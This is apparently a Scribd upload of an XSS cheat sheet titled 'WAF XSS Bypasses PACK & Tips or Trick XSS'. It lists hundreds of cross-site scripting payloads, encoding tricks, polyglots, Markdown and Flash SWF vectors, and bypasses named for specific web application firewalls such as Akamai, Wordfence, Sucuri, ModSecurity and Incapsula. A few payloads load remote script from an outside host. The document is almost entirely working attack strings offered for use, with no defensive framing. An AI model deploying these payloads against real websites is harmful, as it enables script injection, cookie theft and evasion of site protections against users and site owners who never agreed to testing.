Open navigation menu

Welcome to Scribd!

Script X Ss Page

Uploaded by

0% found this document useful (0 votes)

240 views545 pages

htnghngnbgf

Original Title

Script x Ss Page

Copyright

© © All Rights Reserved

Available Formats

DOCX, PDF, TXT or read online from Scribd

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Report this Document

htnghngnbgf

Copyright:

© All Rights Reserved

Available Formats

Download as DOCX, PDF, TXT or read online from Scribd

Flag for inappropriate content

0% found this document useful (0 votes)

240 views545 pages

Script X Ss Page

Uploaded by

htnghngnbgf

Copyright:

© All Rights Reserved

Available Formats

Download as DOCX, PDF, TXT or read online from Scribd

Flag for inappropriate content

Jump to Page

You are on page 1of 545

Search inside document

"><IMG%20SRC%3DX%20ONERROR%3DPROMPT%281%29>%20%20ABC%3FLOCALE

%3D<SVG/ONLOAD%3DALERT%281%29>%20%20<IFRAME%20SRC%3D"DATA%3ATEXT/HTML
%2C<SCRIPT>ALERT%281%29</SCRIPT>"%20CSP%3D"SCRIPT-SRC%20NONE%3B">
%20%20%27"></TITLE></SCRIPT><IMG%20SRC%3DX%20ONERROR%3DCONFIRM%281%29>
%20NOV%2028%2C%202019%20COMMENT%3A%20">%20%20ABC%3FLOCALE%3D
%20%20%20%20%27">%20NOV%2028%2C%202019%20COMMENT%3A%20<METER
%20ONMOUSEOVER%3D"ALERT%281%29"/<svg
onload=document.writeln(decodeURI(location.hash))>#<img src=1 onerror=alert(1)>
<svg/onload=eval(atob(URL.slice(-
148)))>#d2l0aChkb2N1bWVudClib2R5LmFwcGVuZENoaWxkKGNyZWF0ZUVsZW1lbnQoL3NjcmlwdC8
uc291cmNlKSkuc3JjPWF0b2IoL0x5OWljblYwWld4dloybGpMbU52YlM1aWNpOHkvLnNvdXJjZSk=
<javascript: onmouseover=location=tagName%2bURL>click me!#%0Aalert(1)
<javascript onclick=alert(tagName)>me!
<javascript: onclick=location=tagName%2BinnerHTML%2Blocation.hash>/*click me!#*/alert(1)<x
onclick=alert(1)>//X
<img src=x onerror=alert(1)>//
<img src=x autofocus onfocus=alert(1)>//
<svg onload=alert(1)>//
<x onclick=alert(1)>X
<img src=x onerror=alert(1)>
<img src=x autofocus onfocus=alert(1)>
<svg onload=alert(1)>
<script>alert(1)</script>
</script><script>alert(1)</script>
</noscript><script>alert(1)</script><noscript>
</title><svg onload=alert(1)><title>
%2522%253E%253CsVg oNlOaD%253Dalert%25281%2529%253e
%2522%253E%253CsVg oNlOaD%253D%2522alert%25281%2529
%2527%253E%253CsVg oNlOaD%253D%2527alert%25281%2529
%2522%253E%253CsVg oNlOaD%253Dal%255cu0065rt%25281%2529%253e
%253c%252fsCrIpT%253e%253csCrIpT%253ealert%25281%2529%253c%252fsCrIpT%253e
%2522%252dalert%25281%2529%252d%2522
%2522%252dal%255cu0065rt%25281%2529%252d%2522
%2527%252dalert%25281%2529%252d%2527
%2527%252dal%255cu0065rt%25281%2529%252d%2527
%255c%2522%253balert%25281%2529%253b%252f%252f
%255c%2527%253balert%25281%2529%253b%252f%252f
</sCrIpT><sCrIpT/*%0A<k>%28confirm%29(1)</sCrIpT>//
<iMg%0A%2fsRc%0A%3D%2f%20%0A/**/oNcLiCk%0A%3D%28confirm%29(1)>//
<bOdY%0A////////%0A%00/**/oNlOaD%0A%20%3D%28confirm%29(1)>//
<iframe srcdoc=%26lt;svg/o%26%23x6Eload%26equals;alert%26lpar;1)%26gt;>
<javascript: onclick=alert(tagName%2BinnerHTML%2Blocation.hash)>/*click me!#*/alert(1)
<sVg%0A////////%0A%00/%0A/**/oNlOaD%0A=(confirm)(1)>//
<output name="jAvAsCriPt://%26NewLine;\u0061ler%26%23116(1)" onclick="eval(name)">X</output>
<javascript: onmouseover=location=tagName%2bURL>click me!#%0Aalert(1)
<javascript: onclick=location=tagName%2BinnerHTML%2Blocation.hash>/*click me!#*/alert(1)
<svg onload=`<script`-alert(1)>
<svg onload=top[8680439..toString(30)](1)>
<svg onload=javas%26%2399ript:alert(1)>
<script src=https://www.google.com/complete/search?client=chrome%26jsonp=alert(1);></script>
<input onfocus="alert(1)" autofocus>
</title><svg onload=alert(1)><title>
</NOSCRIPT><svg onload=alert(1)><NOSCRIPT>
testtest"autofocus onfocus=alert(1)//
testtest'autofocus onfocus=alert(1)//
testtest"autofocus onfocus="alert(1)
testtest'autofocus onfocus='alert(1)
testtest"><svg onload="alert(1)
testtest'><svg onload='alert(1)
testtest"><svg onload=alert(1)>
testtest'><svg onload=alert(1)>
testtest%2522%252F%253E%253Csvg%20onload%3Dalert(1)%253E
</SCRIPT>%0A<SCRIPT>alert(1)</SCRIPT>
</SCRIPT>%0A<svg onload=alert(1)>
<output name="jAvAsCriPt://%26NewLine;\u0061ler%26%23116(1)" onclick="eval(name)">X</output>
<svg/onload=location=/javas/.source%2B/cript:/.source%2B/ale/.source%2B/rt/.source
%2Blocation.hash[1]%2B1%2Blocation.hash[2]>#()
<embed src='//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?
allowedDomain=\"})))}catch(e){alert(1337)}//' allowscriptaccess=always>
"><video </onloadeddata="1> (_=alert,_('sadd'))"" controls><source
src="https://www.w3schools.com/html/mov_bbb.mp4"></video>

"-alert(1)//
'-alert(1)//
"-alert(1)-"
'-alert(1)-'
";alert(1);"
';alert(1);'
";-alert(1);"
';-alert(1);'
";-alert(1);-"
';-alert(1);-'
\";alert(1);//
\';alert(1);//
\\";alert(1);//
\\';alert(1);//
\";-alert(1);//
\';-alert(1);//
\\";-alert(1);//
\\';-alert(1);//
\";alert(1);//
\';alert(1);//
\";-alert(1);//
\';-alert(1);//
\";alert(1)//
\';alert(1)//
alert(1)
";alert(1); var foo="
';alert(1); var foo='
";}alert(1);function x(){//
';}alert(1);function x(){//
";}alert(1);-function x(){//
';}alert(1);-function x(){//
\"})))}catch(e){alert(1)}//
'}alert(1);{'
'}alert(1)%0A{'
\'}alert(1);{//
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(1)
)//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/
alert(1)%26sol;%26sol;
'';!--"<XSS>=&{()}
'';!--"=&{()}
'';!--"=&{()}
javascript:alert(1)
"'--!><Script /K/>confirm(1)</Script /K/>#
–!"><svg/onload=confirm(1)>
<"/*'/*</Title/</Script/--><svg/**/; OnlOad=(alert)(1)>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(1)
)//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(1)//>\
x3e(document.cookie) =
%26%2340;%26%23100;%26%23111;%26%2399;%26%23117;%26%23109;%26%23101;%26%23110;
%26%23116;%26%2346;%26%2399;%26%23111;%26%23111;%26%23107;%26%23105;%26%23101;
%26%2341;+--------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------
--------------+
WAF XSS Bypasses PACK & Tips or Trick XSS
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+

+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
1. Chrome XSS-Auditor
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
<svg><animate xlink:href=#x attributeName=href values=javascript:alert(1) /><a id=x><rect
width=100 height=100 /></a>
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+

+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
2. Chrome v60 beta XSS-Auditor
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
<script src="data:,alert(1)%250A-->
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+

+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
3. Chrome v44 XSS filter
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
<svg><script>/<@/>alert(1)</script>
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+

+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
4. Other Chrome XSS-Auditor
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
<script>alert(1)</script
<script>alert(1)%0d%0a-->%09</script
<x>%00%00%00%00%00%00%00<script>alert(1)</script>
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+

+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
5. Safari XSS Vector
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
<script>location.href;'javascript:alert%281%29'</script>
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+

+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
6. Kona WAF (Akamai)
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
\');confirm(1);//
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+

+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
7. Wordfence
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
<meter onmouseover="alert(1)"
'">><div><meter onmouseover="alert(1)"</div>"
>><marquee loop=1 width=0 onfinish=alert(1)>
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+

+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
8. Wordfence 7.4.2
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
<a href=%26%2301javascript:alert(1)>
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
9. Sucuri CloudProxy (POST only)
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
<a href=javascript%26colon;confirm(1)>
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+

+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
10. ModSecurity CRS 3.2.0 PL1
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
<a href="jav%0Dascript%26colon;alert(1)">
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+

+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
11. ModSecurity WAF Bypass
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
<img src=x onerror=prompt(document.domain) onerror=prompt(document.domain)
onerror=prompt(document.domain)>
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+

+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
12. Access Denied
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
</script><Body%2FOnpointerenter=$.getScript("//brutelogic.com.br/2.js")>
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+

+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
13. 403 ERROR (CloudFront)
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
<svg %01onload=alert(1)>
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
14. Incapsula WAF
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
<iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';>
<iframe/onload="var b = 'document.domain)'; var a = 'JaV' + 'ascRipt:al' + 'ert(' + b; this['src']=a">
<img/src=q onerror='new Function`al\ert\`1\``'>
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+

+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
15. jQuery < 3.0.0 XSS
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
$.get('http://sakurity.com/jqueryxss')
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+

+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
16. URL verification bypasses (works without 	 too)
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
javas	cript://www.google.com/%0Aalert(1)
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+

+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
17. Markdown XSS
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
[a](javascript:confirm(1))
[a](javascript://www.google.com%0Aprompt(1))
[a](javascript://%0d%0aconfirm(1))
[a](javascript://%0d%0aconfirm(1);com)
[a](javascript:window.onerror=confirm;throw%201)
[a]: (javascript:prompt(1))
[a]:(?javascript:alert(1)) //Add SOH Character
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+

+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
18. Flash SWF XSS
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
ZeroClipboard:
ZeroClipboard.swf?id=\"))}catch(e){confirm(/XSS./.source);}//&width=500&height=500&.swf
plUpload Player: plupload.flash.swf?%#target%g=alert&uid%g=XSS&
plUpload MoxiePlayer: Moxie.swf?target%g=confirm&uid%g=XSS (also works with Moxie.cdn.swf and
other variants)
FlashMediaElement: flashmediaelement.swf?jsinitfunctio%gn=alert1
videoJS: video-js.swf?readyFunction=confirm and video-js.swf?readyFunction=alert
%28document.domain%2b'%20XSS'%29
YUI "io.swf": io.swf?yid=\"));}catch(e){alert(document.domain);}//
YUI "uploader.swf": uploader.swf?allowedDomain=\%22}%29%29%29}catch%28e%29{alert
%28document.domain%29;}//<
Open Flash Chart: open-flash-chart.swf?get-data=(function(){alert(1)})()
AutoDemo: control.swf?onend=javascript:alert(1)//
Adobe FLV Progressive: /main.swf?baseurl=asfunction:getURL,javascript:alert(1)// and
/FLVPlayer_Progressive.swf?skinName=asfunction:getURL,javascript:alert(1)//
Banner.swf (generic): banner.swf?clickTAG=javascript:alert(document.domain);//
JWPlayer (legacy): player.swf?playerready=alert(document.domain) and /player.swf?
tracecall=alert(document.domain)
SWFUpload 2.2.0.1: swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!confirm(1);//
Uploadify (legacy): uploadify.swf?movieName=%22])}catch(e){if(!window.x){window.x=1;confirm(%27XSS
%27)}}//&.swf
FlowPlayer 3.2.7: flowplayer-3.2.7.swf?config={"clip":{"url":"http://edge.flowplayer.org/
bauhaus.mp4","linkUrl":"JavaScriPt:confirm(document.domain)"}}&.swf
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+

+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
19. XSS trigger open redirect
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
Param=java%09script:alert(1)
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+

+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
20. XSS filter bypass using stripped
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
<</div>script</div>>alert()<</div>/script</div>>
<</img>script</img>>alert()<</img>/script</img>>
<</a>script</a>>alert()<</a>/script</a>>
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+

+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
21. Advanced Javascript
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
test%27){prompt(1);}});var%20a%20=`;$(document).ready(function(){if(0){//
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+

+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
22. Email Validation
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
"><svg/onload=confirm(1)>"@x.y
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+

+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
23. XSS filter evasion
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
document.location=unescape("%19Jav%09asc%09ript:https ://foobar/%250Aconfirm%25281%2529")
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+

+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
24. Javascript Tips
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
No quotes = -(confirm)(document.domain)//
With single query = '-(confirm)(document.domain)//'
With Double query = "-(confirm)(document.domain)//"
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+

+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
25. String XSS Bypassed
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
/**/
/*
/
javascript%26colon;alert(1) (ex; %26colon; --> :)
+
%3D
%26lpar;1%26%2341; (ex; <svg onload=alert%26lpar;1%26%2341;>)
</<K> (ex; </script/<K>)
%0A
%0C
%0D
%00
%01
%09


<![CDATA[//><!--
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+

+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
26. Alert, confirm, prompt, pop. (Bypassed)
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
a=alert,b=1,a(b) (ex; <svg onload=a=alert,b=1,a(b)>)
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
[1].find(alert) (ex; <svg onload=[1].find(alert)>)
[1].map(alert) (ex; <svg onload=[1].map(alert)>)
[1].every(alert) (ex; <svg onload=[1].every(alert)>)
[1].filter(alert) (ex; <svg onload=[1].filter(alert)>)
[1].findIndex(alert) (ex; <svg onload=[1].findIndex(alert)>)
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
alert(1) (ex; <svg onload=alert(1)>)
{alert(1)} (ex; <svg onload={alert(1)}>)
(alert(1)) (ex; <svg onload=(alert(1))>)
(alert)(1) (ex; <svg onload=[1].findIndex(alert)>)
{(alert)(1)} (ex; <svg onload={(alert)(1)}>)
alert(1)// (ex; <svg onload=alert(1)//>)
alert`1` (ex; <svg onload=alert`1`>)
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
al\u0065rt(1) (ex; <svg onload=alert`1`>)
top['al\145rt'](1) (ex; <svg onload=top['al\145rt'](1)>)
top[8680439..toString(30)](1) (ex; <svg onload=top[8680439..toString(30)](1)>)
al\u0065rt%26lpar;1%26rpar; (ex; <svg onload=al\u0065rt%26lpar;1%26rpar;>)
al\u%26%2348;065rt%26%2340;1%26%2341; (ex; <svg onload=al\u%26%2348;065rt
%26%2340;1%26%2341;>)
%26%2397;%26%23108;%26%23101;%26%23114;%26%23116;%26lpar;1%26rpar; (ex; <svg
onload=alert`1`>)
%26%2397;%26%23108;%26%23101;%26%23114;%26%23116;%26%2340;1%26%2341; (ex; <svg
onload=%26%2397;%26%23108;%26%23101;%26%23114;%26%23116;%26%2340;1%26%2341;>)
self['\x61\x6c\x65\x72\x74']%26lpar;'\x58\x53\x53'%29 (ex; <svg onload=self['\x61\x6c\x65\x72\x74']
%26lpar;'\x58\x53\x53'%29>)
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
27. Hidden Input,img,etc.
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
<"input type="hidden" value="XSS" onclick=alert(1)" + "accesskey="X"">

accesskey="x"

Press "Alt" + "Shift" + "X"

+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+

+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
28. Cookie [Removed] Bypass XSS
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
(document.cookie) =
%26%2340;%26%23100;%26%23111;%26%2399;%26%23117;%26%23109;%26%23101;%26%23110;
%26%23116;%26%2346;%26%2399;%26%23111;%26%23111;%26%23107;%26%23105;%26%23101;
%26%2341;
(document.cookie) = %26lpar;
%26%23100;%26%23111;%26%2399;%26%23117;%26%23109;%26%23101;%26%23110;%26%23116
;%26%2346;%26%2399;%26%23111;%26%23111;%26%23107;%26%23105;%26%23101;%26rpar;
(document.cookie) = %26lpar;
%26%23100;%26%23111;%26%2399;%26%23117;%26%23109;%26%23101;%26%23110;%26%23116
;%26%2346;%26%2399;%26%23111;%26%23111;%26%23107;%26%23105;%26%23101;%29
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+

+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
29. XSS Polygots
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
<"/*'/*</Title/</Script/--><svg/**/; OnlOad=(alert)(1)>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(1)
)//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(1)//>\x3e
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+

+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
30. Dom XSS Attack
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
</script><svg onload=alert(1)>
"-alert(1)//
'-alert(1)//
"-alert(1)-"
'-alert(1)-'
";alert(1);"
';alert(1);'
";-alert(1);"
';-alert(1);'
";-alert(1);-"
';-alert(1);-'
\";alert(1);//
\';alert(1);//
\\";alert(1);//
\\';alert(1);//
\";-alert(1);//
\';-alert(1);//
\\";-alert(1);//
\\';-alert(1);//
\";alert(1);//
\';alert(1);//
\";-alert(1);//
\';-alert(1);//
\";alert(1)//
\';alert(1)//
alert(1)
";alert(1); var foo="
';alert(1); var foo='
";}alert(1);function x(){//
';}alert(1);function x(){//
";}alert(1);-function x(){//
';}alert(1);-function x(){//
\"})))}catch(e){alert(1)}//
'}alert(1);{'
'}alert(1)%0A{'
\'}alert(1);{//
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+

+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
31. XSS Testing
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
testtest't"t%5Ct%2Ft<"">t%0At%2522t
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+

+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
32. XSS Quick Test
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
'';!--"<XSS>=&{()}
'';!--"=&{()}
'';!--"=&{()}
+------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------+
https://www.rapidtables.com/web/html/html-codes.html{alert(1)}
(alert)(1)
a=alert,a(1)
a=alert,b=1,()
$=1,alert($)
a=alert,[1].find(a)
a=alert,b=4,[b].find(a)
[1].map(alert)
[1].find(alert)
[1].every(alert)
[1].filter(alert)
[1].findIndex(alert)
'-[1].on*(alert())-'
al\u0065rt(1)
top['al\145rt'](1)
top[8680439..toString(30)](1)
setInterval`alert\x28document.domain\x29`
%26emsp;prompt`${1}`
setTimeout`alert\x28document.domain\x29`
with(document)alert(domain)
a=setTimeout,b=alert,c=document.domain,a`b\x28c\x29`
[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162']
('\141\154\145\162\164\50\61\51')()
al\u0065rt%26lpar;1%26rpar;
al\u%26%2348;065rt%26%2340;1%26%2341;
%26%2397;%26%23108;%26%23101;%26%23114;%26%23116;%26lpar;1%26rpar;
%26%2397;%26%23108;%26%23101;%26%23114;%26%23116;%26%2340;1%26%2341;
self['\x61\x6c\x65\x72\x74']%26lpar;'\x58\x53\x53'%29
top.open`javas\cript:al\ert(1)`
foo=[123,666,999]
a=top[Object.keys(top).filter((v)=>{if(/^do/.test(v))return 1})];for(i in a)if(/ie$/.test(i))alert(a[i])accesskey="x"

Press "Alt" + "Shift" + "X"<script\x20type="text/javascript">javascript:alert(1);</script>

<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
<audio src=1 href=1 onerror="javascript:alert(1)"></audio>
<video src=1 href=1 onerror="javascript:alert(1)"></video>
<body src=1 href=1 onerror="javascript:alert(1)"></body>
<image src=1 href=1 onerror="javascript:alert(1)"></image>
<object src=1 href=1 onerror="javascript:alert(1)"></object>
<script src=1 href=1 onerror="javascript:alert(1)"></script>
<svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize>
<title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title
onPropertyChange>
<iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad>
<body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter>
<body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus>
<frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll>
<script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script
onReadyStateChange>
<html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp>
<body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body
onPropertyChange>
<svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad>
<body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide>
<body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver>
<body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload>
<body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad>
<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound
onPropertyChange>
<html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave>
<html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel>
<style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad>
<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe
onReadyStateChange>
<body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow>
<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style
onReadyStateChange>
<frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus>
<applet onError applet onError="javascript:javascript:alert(1)"></applet onError>
<marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart>
<script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad>
<html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver>
<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter>
<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload>
<html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown>
